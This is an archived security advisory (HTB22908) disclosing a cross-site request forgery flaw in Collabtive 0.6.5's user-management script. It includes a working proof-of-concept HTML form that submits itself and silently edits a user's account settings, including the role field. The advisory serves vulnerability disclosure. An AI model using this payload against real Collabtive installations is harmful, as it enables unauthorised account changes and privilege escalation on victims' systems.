[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

HTB22908: XSRF (CSRF) in Collabtive



Vulnerability ID: HTB22908
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_collabtive.html
Product: Collabtive
Vendor: Open Dynamics ( http://collabtive.o-dyn.de/ ) 
Vulnerable Version: 0.6.5 and probably prior versions
Vendor Notification: 17 March 2011 
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "manageuser.php" script to properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/admin.php?action=edituser&id=USERID"; method="post" name="main" enctype="multipart/form-data">
<input type="hidden" name="name" value="username">
<input type="hidden" name="email" value="email@xxxxxxxxxxx">
<input type="hidden" name="locale" value="en">
<input type="hidden" name="admin" value="">
<input type="hidden" name="newpass" value="">
<input type="hidden" name="repeatpass" value="">
<input type="hidden" name="role" value="1">
</form>
<script>
document.main.submit();
</script>